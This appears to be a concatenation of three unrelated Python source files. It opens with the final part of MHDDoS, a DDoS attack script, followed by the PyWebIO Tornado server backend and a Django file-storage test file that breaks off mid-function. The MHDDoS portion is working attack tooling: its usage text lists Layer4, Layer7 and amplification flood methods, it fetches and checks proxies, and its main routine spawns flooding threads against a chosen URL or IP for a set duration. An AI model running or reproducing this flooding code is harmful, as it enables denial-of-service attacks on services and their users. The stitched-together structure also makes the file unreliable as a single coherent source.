t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
print('please wait ...', end="\r")
with get(domain, timeout=20) as r:
print(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
return
print("Error!")
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info("TCP: %s\n" % (info['_tsdns._tcp.']))
logger.info("UDP: %s\n" % (info['_ts3._udp.']))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path(__dir__ / "go/bin/bombardier")
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for _ in range(threads):
HttpFlood(url, host, method, rpc, event, uagents,
referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
tornado.py | import asyncio
import fnmatch
import json
import logging
import os
import threading
import webbrowser
from functools import partial
from urllib.parse import urlparse
import tornado
import tornado.httpserver
import tornado.ioloop
from tornado.web import StaticFileHandler
from tornado.websocket import WebSocketHandler
from .utils import make_applications, render_page, cdn_validation
from ..session import CoroutineBasedSession, ThreadBasedSession, ScriptModeSession, \
register_session_implement_for_target, Session
from ..session.base import get_session_info_from_headers
from ..utils import get_free_port, wait_host_port, STATIC_PATH, iscoroutinefunction, isgeneratorfunction, check_webio_js
logger = logging.getLogger(__name__)
_ioloop = None
def ioloop() -> tornado.ioloop.IOLoop:
"""获得运行Tornado server的IOLoop"""
global _ioloop
return _ioloop
def _check_origin(origin, allowed_origins, handler: WebSocketHandler):
if _is_same_site(origin, handler):
return True
return any(
fnmatch.fnmatch(origin, patten)
for patten in allowed_origins
)
def _is_same_site(origin, handler: WebSocketHandler):
parsed_origin = urlparse(origin)
origin = parsed_origin.netloc
origin = origin.lower()
host = handler.request.headers.get("Host")
# Check to see that origin matches host directly, including ports
return origin == host
def _webio_handler(applications, cdn, check_origin_func=_is_same_site):
"""获取用于Tornado进行整合的RequestHandler类
:param dict applications: 任务名->任务函数 的字典
:param bool/str cdn:
:param callable check_origin_func: check_origin_func(origin, handler) -> bool
:return: Tornado RequestHandler类
"""
check_webio_js()
class WSHandler(WebSocketHandler):
async def get(self, *args, **kwargs) -> None:
# It's a simple http GET request
if self.request.headers.get("Upgrade", "").lower() != "websocket":
# Backward compatible
if self.get_query_argument('test', ''):
return self.write('')
app_name = self.get_query_argument('app', 'index')
app = applications.get(app_name) or applications['index']
html = render_page(app, protocol='ws', cdn=cdn)
return self.write(html)
else:
await super().get()
def check_origin(self, origin):
return check_origin_func(origin=origin, handler=self)
def get_compression_options(self):
# Non-None enables compression with default options.
return {}
def send_msg_to_client(self, session: Session):
for msg in session.get_task_commands():
self.write_message(json.dumps(msg))
def open(self):
logger.debug("WebSocket opened")
# self.set_nodelay(True)
self._close_from_session_tag = False # 由session主动关闭连接
session_info = get_session_info_from_headers(self.request.headers)
session_info['user_ip'] = self.request.remote_ip
session_info['request'] = self.request
session_info['backend'] = 'tornado'
app_name = self.get_query_argument('app', 'index')
application = applications.get(app_name) or applications['index']
if iscoroutinefunction(application) or isgeneratorfunction(application):
self.session = CoroutineBasedSession(application, session_info=session_info,
on_task_command=self.send_msg_to_client,
on_session_close=self.close_from_session)
else:
self.session = ThreadBasedSession(application, session_info=session_info,
on_task_command=self.send_msg_to_client,
on_session_close=self.close_from_session,
loop=asyncio.get_event_loop())
def on_message(self, message):
data = json.loads(message)
if data is not None:
self.session.send_client_event(data)
def close_from_session(self):
self._close_from_session_tag = True
self.close()
def on_close(self):
if not self._close_from_session_tag: # 只有在由客户端主动断开连接时,才调用 session.close()
self.session.close()
logger.debug("WebSocket closed")
return WSHandler
def webio_handler(applications, cdn=True, allowed_origins=None, check_origin=None):
"""获取在Tornado中运行PyWebIO应用的RequestHandler类。RequestHandler类基于WebSocket协议与浏览器进行通讯。
:param callable/list/dict applications: PyWebIO应用。
:param bool/str cdn: 是否从CDN加载前端静态资源,默认为 ``True`` 。设置成 ``False`` 时会从PyWebIO应用部署URL的同级目录下加载静态资源。
支持传入自定义的URL来指定静态资源的部署地址
:param list allowed_origins: 除当前域名外,服务器还允许的请求的来源列表。
:param callable check_origin: 请求来源检查函数。
关于各参数的详细说明见 :func:`pywebio.platform.tornado.start_server` 的同名参数。
:return: Tornado RequestHandler类
"""
applications = make_applications(applications)
for target in applications.values():
register_session_implement_for_target(target)
cdn = cdn_validation(cdn, 'error')
if check_origin is None:
check_origin_func = partial(_check_origin, allowed_origins=allowed_origins or [])
else:
check_origin_func = lambda origin, handler: _is_same_site(origin, handler) or check_origin(origin)
return _webio_handler(applications=applications, cdn=cdn, check_origin_func=check_origin_func)
async def open_webbrowser_on_server_started(host, port):
url = 'http://%s:%s' % (host, port)
is_open = await wait_host_port(host, port, duration=20)
if is_open:
logger.info('Try open %s in web browser' % url)
webbrowser.open(url)
else:
logger.error('Open %s failed.' % url)
def _setup_server(webio_handler, port=0, host='', **tornado_app_settings):
if port == 0:
port = get_free_port()
handlers = [(r"/", webio_handler),
(r"/(.*)", StaticFileHandler, {"path": STATIC_PATH, 'default_filename': 'index.html'})]
app = tornado.web.Application(handlers=handlers, **tornado_app_settings)
server = app.listen(port, address=host)
return server, port
def start_server(applications, port=0, host='',
debug=False, cdn=True,
allowed_origins=None, check_origin=None,
auto_open_webbrowser=False,
websocket_max_message_size=None,
websocket_ping_interval=None,
websocket_ping_timeout=None,
**tornado_app_settings):
"""启动一个 Tornado server 将PyWebIO应用作为Web服务提供。
Tornado为PyWebIO应用的默认后端Server,可以直接使用 ``from pywebio import start_server`` 导入。
:param list/dict/callable applications: PyWebIO应用. 可以是任务函数或者任务函数的字典或列表。
类型为字典时,字典键为任务名,类型为列表时,函数名为任务名。
可以通过 ``app`` URL参数选择要运行的任务(例如访问 ``http://host:port/?app=foo`` 来运行 ``foo`` 任务),
默认使用运行 ``index`` 任务函数,当 ``index`` 任务不存在时,PyWebIO会提供一个默认的索引页作为主页。
参见 :ref:`Server模式 <server_and_script_mode>`
任务函数为协程函数时,使用 :ref:`基于协程的会话实现 <coroutine_based_session>` ;任务函数为普通函数时,使用基于线程的会话实现。
:param int port: 服务监听的端口。设置为 ``0`` 时,表示自动选择可用端口。
:param str host: 服务绑定的地址。 ``host`` 可以是IP地址或者为hostname。如果为hostname,服务会监听所有与该hostname关联的IP地址。
通过设置 ``host`` 为空字符串或 ``None`` 来将服务绑定到所有可用的地址上。
:param bool debug: 是否开启Tornado Server的debug模式,开启后,代码发生修改后服务器会自动重启。
详情请参阅 `tornado 文档 <https://www.tornadoweb.org/en/stable/guide/running.html#debug-mode>`_
:param bool/str cdn: 是否从CDN加载前端静态资源,默认为 ``True`` 。支持传入自定义的URL来指定静态资源的部署地址
:param list allowed_origins: 除当前域名外,服务器还允许的请求的来源列表。
来源包含协议、域名和端口部分,允许使用 Unix shell 风格的匹配模式(全部规则参见 `Python文档 <https://docs.python.org/zh-tw/3/library/fnmatch.html>`_ ):
- ``*`` 为通配符
- ``?`` 匹配单个字符
- ``[seq]`` 匹配seq中的任何字符
- ``[!seq]`` 匹配任何不在seq中的字符
比如 ``https://*.example.com`` 、 ``*://*.example.com``
:param callable check_origin: 请求来源检查函数。接收请求来源(包含协议、域名和端口部分)字符串作为参数,
返回 ``True/False`` 指示服务器接受/拒绝该请求。若设置了 ``check_origin`` , ``allowed_origins`` 参数将被忽略
:param bool auto_open_webbrowser: 当服务启动后,是否自动打开浏览器来访问服务。(该操作需要操作系统支持)
:param int websocket_max_message_size: Tornado Server最大可接受的WebSockets消息大小。单位为字节,默认为10MiB。
:param int websocket_ping_interval: 当被设置后,服务器会以 ``websocket_ping_interval`` 秒周期性地向每个WebSockets连接发送‘ping‘消息。
如果应用处在某些反向代理服务器之后,设置 ``websocket_ping_interval`` 可以避免WebSockets连接被代理服务器当作空闲连接而关闭。
同时,若WebSockets连接在某些情况下被异常关闭,应用也可以及时感知。
:param int websocket_ping_timeout: 如果设置了 ``websocket_ping_interval`` ,而服务没有在发送‘ping‘消息后的 ``websocket_ping_timeout`` 秒
内收到‘pong’消息,应用会将连接关闭。默认的超时时间为 ``websocket_ping_interval`` 的三倍。
:param tornado_app_settings: 传递给 ``tornado.web.Application`` 构造函数的额外的关键字参数
可设置项参考: https://www.tornadoweb.org/en/stable/web.html#tornado.web.Application.settings
.. versionadded:: 1.1
The *cdn* parameter.
"""
kwargs = locals()
global _ioloop
_ioloop = tornado.ioloop.IOLoop.current()
app_options = ['debug', 'websocket_max_message_size', 'websocket_ping_interval', 'websocket_ping_timeout']
for opt in app_options:
if kwargs[opt] is not None:
tornado_app_settings[opt] = kwargs[opt]
cdn = cdn_validation(cdn, 'warn')
handler = webio_handler(applications, cdn, allowed_origins=allowed_origins, check_origin=check_origin)
_, port = _setup_server(webio_handler=handler, port=port, host=host, **tornado_app_settings)
print('Listen on %s:%s' % (host or '0.0.0.0', port))
if auto_open_webbrowser:
tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, host or 'localhost', port)
tornado.ioloop.IOLoop.current().start()
def start_server_in_current_thread_session():
"""启动 script mode 的server,监听可用端口,并自动打开浏览器
PYWEBIO_SCRIPT_MODE_PORT环境变量可以设置监听端口,并关闭自动打开浏览器,用于测试
"""
websocket_conn_opened = threading.Event()
thread = threading.current_thread()
mock_apps = dict(index=lambda: None)
class SingleSessionWSHandler(_webio_handler(applications=mock_apps, cdn=False)):
session = None
instance = None
def open(self):
self.main_session = False
if SingleSessionWSHandler.session is None:
self.main_session = True
SingleSessionWSHandler.instance = self
session_info = get_session_info_from_headers(self.request.headers)
session_info['user_ip'] = self.request.remote_ip
session_info['request'] = self.request
session_info['backend'] = 'tornado'
SingleSessionWSHandler.session = ScriptModeSession(thread, session_info=session_info,
on_task_command=self.send_msg_to_client,
loop=asyncio.get_event_loop())
websocket_conn_opened.set()
else:
self.close()
def on_close(self):
if SingleSessionWSHandler.session is not None and self.main_session:
self.session.close()
logger.debug('ScriptModeSession closed')
async def wait_to_stop_loop(server):
"""当只剩当前线程和Daemon线程运行时,关闭Server"""
alive_none_daemonic_thread_cnt = None # 包括当前线程在内的非Daemon线程数
while alive_none_daemonic_thread_cnt != 1:
alive_none_daemonic_thread_cnt = sum(
1 for t in threading.enumerate() if t.is_alive() and not t.isDaemon()
)
await asyncio.sleep(1)
# 关闭Websocket连接
if SingleSessionWSHandler.instance:
SingleSessionWSHandler.instance.close()
server.stop()
logger.debug('Closing tornado ioloop...')
tasks = [t for t in asyncio.all_tasks() if t is not asyncio.current_task() and not t.done()]
for task in tasks: task.cancel()
# 必须需要 await asyncio.sleep ,否则 t.cancel() 调用无法调度生效
await asyncio.sleep(0)
tornado.ioloop.IOLoop.current().stop()
def server_thread():
from tornado.log import access_log, app_log, gen_log
access_log.setLevel(logging.ERROR)
app_log.setLevel(logging.ERROR)
gen_log.setLevel(logging.ERROR)
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
global _ioloop
_ioloop = tornado.ioloop.IOLoop.current()
port = 0
if os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"):
port = int(os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"))
server, port = _setup_server(webio_handler=SingleSessionWSHandler, port=port, host='localhost')
tornado.ioloop.IOLoop.current().spawn_callback(partial(wait_to_stop_loop, server=server))
if "PYWEBIO_SCRIPT_MODE_PORT" not in os.environ:
tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, 'localhost', port)
tornado.ioloop.IOLoop.current().start()
logger.debug('Tornado server exit')
t = threading.Thread(target=server_thread, name='Tornado-server')
t.start()
websocket_conn_opened.wait()
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
